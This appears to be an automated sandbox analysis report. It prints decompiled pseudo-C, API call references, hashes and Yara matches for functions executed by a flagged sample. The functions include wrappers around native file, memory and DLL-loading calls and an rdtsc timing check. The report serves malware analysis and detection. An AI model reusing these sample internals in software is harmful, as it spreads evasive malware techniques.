                                                              • API String ID: 1029625771-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01A4A516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 064D1B05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 064D1B05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              C-Code - Quality: 21%
                                                              			E0041869A(signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t20;
                                                              				void* _t31;
                                                              				intOrPtr* _t32;
                                                              				void* _t34;
                                                              
                                                              				asm("out dx, al");
                                                              				 *(__edi + 0x559a57ef) =  *(__edi + 0x559a57ef) >> __ecx;
                                                              				_t15 = _a4;
                                                              				_t32 = _a4 + 0xc48;
                                                              				E004191F0(__edi, _a4, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                              				_t6 =  &_a40; // 0x413a41
                                                              				_t20 =  *((intOrPtr*)( *_t32))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t6, _t31, _t34); // executed
                                                              				return _t20;
                                                              			}








                                                              APIs
                                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: A:A
                                                              • API String ID: 2738559852-2859176346
                                                              • Opcode ID: 2cdd7e05e09b2123967d775f78f849566628f1b014604cccfee217afc4bc1258
                                                              • Instruction ID: f4a3684558b612a2fa94b2540d8c7a2a3344d893819f1576fe7ed639326c6e0c
                                                              • Opcode Fuzzy Hash: 2cdd7e05e09b2123967d775f78f849566628f1b014604cccfee217afc4bc1258
                                                              • Instruction Fuzzy Hash: B7F0E7B2200209ABDB08DF89DC84DEB77A9EF8C354F058248BE0D97241C630E855CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t18;
                                                              				void* _t27;
                                                              				intOrPtr* _t28;
                                                              
                                                              				_t13 = _a4;
                                                              				_t28 = _a4 + 0xc48;
                                                              				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                              				_t4 =  &_a40; // 0x413a41
                                                              				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                              				return _t18;
                                                              			}







                                                              APIs
                                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: A:A
                                                              • API String ID: 2738559852-2859176346
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E004185EB(void* __ebx, void* __edi, intOrPtr* __esi, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				void* _v1;
                                                              				void* __ebp;
                                                              
                                                              				if(__ebx - 1 < 0) {
                                                              					asm("adc al, 0x83");
                                                              					asm("les edx, [edx+edx*2]");
                                                              					_push(_a16);
                                                              					_push(_a12);
                                                              					return  *((intOrPtr*)( *__esi))();
                                                              				} else {
                                                              					 *((intOrPtr*)(__esi + 0x55)) = __edi;
                                                              					__ebp = __esp;
                                                              					__eax = _a4;
                                                              					_t6 = __eax + 0xc40; // 0xc40
                                                              					__esi = _t6;
                                                              					_a44 = _a32;
                                                              					_a20 = _a8;
                                                              					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              					__esi = __esi;
                                                              					__ebp = __ebp;
                                                              					return __eax;
                                                              				}
                                                              			}






                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c39e46834f76aa3f8c048fc7669ab106f9fe51e0a5375508359928d33a2f3763
                                                              • Instruction ID: 8e173600259d527cff40da85d09929c670c52de49166a402e7e3643a904372b4
                                                              • Opcode Fuzzy Hash: c39e46834f76aa3f8c048fc7669ab106f9fe51e0a5375508359928d33a2f3763
                                                              • Instruction Fuzzy Hash: 1011F0B2204208ABCB48DF88DC84EEB73EDFF8C354B148609FA1C97241C630E8518BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                                                              				char* _v8;
                                                              				struct _EXCEPTION_RECORD _v12;
                                                              				struct _OBJDIR_INFORMATION _v16;
                                                              				char _v536;
                                                              				void* _t15;
                                                              				struct _OBJDIR_INFORMATION _t17;
                                                              				struct _OBJDIR_INFORMATION _t18;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              
                                                              				_v8 =  &_v536;
                                                              				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                                              				_t31 = _t30 + 0xc;
                                                              				if(_t15 != 0) {
                                                              					_t17 = E0041B3A0(__eflags, _v8);
                                                              					_t32 = _t31 + 4;
                                                              					__eflags = _t17;
                                                              					if(_t17 != 0) {
                                                              						E0041B620( &_v12, 0);
                                                              						_t32 = _t32 + 8;
                                                              					}
                                                              					_t18 = E00419730(_v8);
                                                              					_v16 = _t18;
                                                              					__eflags = _t18;
                                                              					if(_t18 == 0) {
                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                              						return _v16;
                                                              					}
                                                              					return _t18;
                                                              				} else {
                                                              					return _t15;
                                                              				}
                                                              			}














                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t21;
                                                              				void* _t31;
                                                              
                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                              				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t21;
                                                              			}






                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E004187CA(void* __eax, void* __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                              				intOrPtr _v0;
                                                              				long _t16;
                                                              				void* _t25;
                                                              
                                                              				_push(_t29);
                                                              				_t12 = _v0;
                                                              				_t3 = _t12 + 0xc60; // 0xca0
                                                              				E004191F0(_t25, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                                                              				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                              				return _t16;
                                                              			}







                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 6c1580441a09a8ec2170b6877a31bfe4f0b32f28bd16d2c0d29d2d2b2dd48e52
                                                              • Instruction ID: c804dde35cf1ac0473364a4c902ef567f94a3ed367e25043d9951f7634916c80
                                                              • Opcode Fuzzy Hash: 6c1580441a09a8ec2170b6877a31bfe4f0b32f28bd16d2c0d29d2d2b2dd48e52
                                                              • Instruction Fuzzy Hash: 00F0F2B2210208ABDB14DF89DC95EEB77ADEF88754F158149FE1997241C634F910CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t14;
                                                              				void* _t21;
                                                              
                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                              				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t14;
                                                              			}






                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E0041871C(void* __esi, intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              				void* _t13;
                                                              
                                                              				_t13 = __esi + 1;
                                                              				asm("sbb byte [edi+0x11], 0x55");
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_push(_t13);
                                                              				_t3 = _t5 + 0xc50; // 0x409773
                                                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}







                                                              APIs
                                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 53a93013a3d916590a7dbbd104cfeeed5cf16c8d55a90a868afdcb9a701f3255
                                                              • Instruction ID: a3a960674d47dfb334ce48929eb3dddf51f861c4edd5726ae695893843251cd9
                                                              • Opcode Fuzzy Hash: 53a93013a3d916590a7dbbd104cfeeed5cf16c8d55a90a868afdcb9a701f3255
                                                              • Instruction Fuzzy Hash: 87E08C752002147BE710EFA8CC89F977B69EF44720F044199BA985B282C630EA4487D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418720(intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_t3 = _t5 + 0xc50; // 0x409773
                                                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}






                                                              APIs
                                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E004088E0(intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v24;
                                                              				char _v284;
                                                              				char _v804;
                                                              				char _v840;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t39;
                                                              				void* _t50;
                                                              				intOrPtr* _t52;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t52 = _a4;
                                                              				_t39 = 0; // executed
                                                              				_t24 = E00406E30(_t52,  &_v24); // executed
                                                              				_t54 = _t53 + 8;
                                                              				if(_t24 != 0) {
                                                              					E00407040( &_v24,  &_v840);
                                                              					_t55 = _t54 + 8;
                                                              					do {
                                                              						E0041A100( &_v284, 0x104);
                                                              						E0041A770( &_v284,  &_v804);
                                                              						_t56 = _t55 + 0x10;
                                                              						_t50 = 0x4f;
                                                              						while(1) {
                                                              							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                                              							_t56 = _t56 + 0x10;
                                                              							if(_t31 != 0) {
                                                              								break;
                                                              							}
                                                              							_t50 = _t50 + 1;
                                                              							if(_t50 <= 0x62) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                              						_t39 = 1;
                                                              						L8:
                                                              						_t33 = E00407070(_t39, _t50,  &_v24,  &_v840);
                                                              						_t55 = _t56 + 8;
                                                              					} while (_t33 != 0 && _t39 == 0);
                                                              					_t34 = E004070F0(_t52,  &_v24); // executed
                                                              					if(_t39 == 0) {
                                                              						asm("rdtsc");
                                                              						asm("rdtsc");
                                                              						_v8 = _t34 - 0 + _t34;
                                                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                              					}
                                                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                              					_t20 = _t52 + 0x31; // 0x5608758b
                                                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                              					return 1;
                                                              				} else {
                                                              					return _t24;
                                                              				}
                                                              			}






















                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                              • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                              • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                              • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID: @P
                                                              • API String ID: 3899507212-4139428406
                                                              • Opcode ID: b045b745e1c36e70cd7be4a877b28efd93bb8d7748d703591821b259e315971e
                                                              • Instruction ID: a58c99f82164f16de02dd07280c4aedbd4433a22374b3a416c0b1aaaa57c2f01
                                                              • Opcode Fuzzy Hash: b045b745e1c36e70cd7be4a877b28efd93bb8d7748d703591821b259e315971e
                                                              • Instruction Fuzzy Hash: 6C0146B5200208AFCB14DF89DC81EEB77A9EF88354F15815AFE1C97241CA30E951CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                              				void* _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                              				_t6 =  &_a8; // 0x413546
                                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: F5A
                                                              • API String ID: 1279760036-683449296
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: a68128f02263c858938b4534922ae9bd2e82e0c6b7bea317de414c30e0931d15
                                                              • Instruction ID: d06cd51920d89e9503d57b19918dcb958bacd9f59fe63c147568b53da6ed8c8c
                                                              • Opcode Fuzzy Hash: a68128f02263c858938b4534922ae9bd2e82e0c6b7bea317de414c30e0931d15
                                                              • Instruction Fuzzy Hash: E701FE32E4022476E711A9956C03FFF7768AB40B25F04456EFE08BA1C2D7A9691642EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                              • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                              • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E004188F2() {
                                                              				char _t12;
                                                              				void* _t17;
                                                              				void* _t21;
                                                              				void* _t22;
                                                              
                                                              				_t22 = _t21 + 1;
                                                              				asm("jecxz 0x1a");
                                                              				asm("aaa");
                                                              				asm("aam 0x82");
                                                              				asm("out 0x78, eax");
                                                              				_push(_t22);
                                                              				_t9 =  *0xFFFFFFFFEA0253C1;
                                                              				_t3 = _t9 + 0xc74; // 0xc74
                                                              				E004191F0(_t17,  *0xFFFFFFFFEA0253C1, _t3,  *((intOrPtr*)( *0xFFFFFFFFEA0253C1 + 0x10)), 0, 0x35);
                                                              				_t12 = RtlFreeHeap( *0xFFFFFFFFEA0253C5,  *0xFFFFFFFFEA0253C9,  *0xFFFFFFFFEA0253CD); // executed
                                                              				return _t12;
                                                              			}








                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: fd6080059986be986c9ae8ef21e12bcc721e5d69e0a88b5c8bbb0af6076930ee
                                                              • Instruction ID: c4ddabe3531c6e5d9c700b550ee0796d03988b238038cc2f984534a44c87bf33
                                                              • Opcode Fuzzy Hash: fd6080059986be986c9ae8ef21e12bcc721e5d69e0a88b5c8bbb0af6076930ee
                                                              • Instruction Fuzzy Hash: ACE026BA1043885BD700EEA498808D77794AF84208721425EEC4843203D125D9198AA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                              				char _t10;
                                                              				void* _t15;
                                                              
                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                              				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
